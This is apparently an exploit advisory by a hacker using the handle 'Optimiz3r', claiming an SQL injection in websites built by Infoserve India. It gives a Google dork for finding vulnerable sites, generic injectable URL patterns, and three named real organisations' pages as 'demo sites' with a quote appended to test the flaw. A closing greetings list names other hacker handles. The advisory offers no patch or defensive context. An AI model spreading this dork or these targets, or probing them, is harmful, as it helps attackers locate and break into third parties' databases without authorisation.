============================================================================================================= -[ Optimiz3r ]- | _______ __ _______ __ _______ | |_ _| |--..-----.| | |.---.-..----.| |--..-----..----..-----.| _ |.----..--------..--.--. | | | | || -__|| || _ || __|| < | -__|| _||__ --|| || _|| || | | | |___| |__|__||_____||___|___||___._||____||__|__||_____||__| |_____||___|___||__| |__|__|__||___ | | |_____| | ============================================================================================================= # Exploit Title : Infoserve SQL Vulnerability # Author : Optimiz3r # Category : webapp # Type : SQL Injection # Email : Optimiz3r[at]hotmail.com # Tested on : Windows XP-SP3 # Google Dork : intext:"Powered by : Infoserve India Pvt. Ltd." Exploit: http://target/whatever.php?id=[SQLi] http://target/[path]/whatever.php?id=[SQLi] Demo Site: http://indiabasketball.org/newsdetails.php?id=165' http://wrestlingfederationofindia.com/about_us.php?id=35' http://www2.phdcci.in/isi/Phdhouse/gallery_category.php?id=222' -------------------------------------=[ Greeetz To]=---------------------------------------------- THA Disastar - THA X-Haxor - THA Mc Mods - THA Gi.igzy jc - THA Naino Disaster - THA Turk Warrior - Gatha incoming - THA Sh4dowF1end_h4xor - THA Gr@v!ty X3r0 - P4R4D0X.COMM4ND3R - THA L - THA th3 c0d3 - THA Cyb3r Ghost - THA Eagle Hax0r - THA Sov3R3ign- THA Attacker Awais- THA SAM - Tha IronicBoy - Tha Rebel - Tha Konvict - THA Optimiz3r (My Self) - Tha FxFlare - Tha Dexter -------------------------------------------------------------------------------------------------- Zaid Sparrow, MLA, PCP, PCA, PCH --------------------------------------------------------------------------------------------------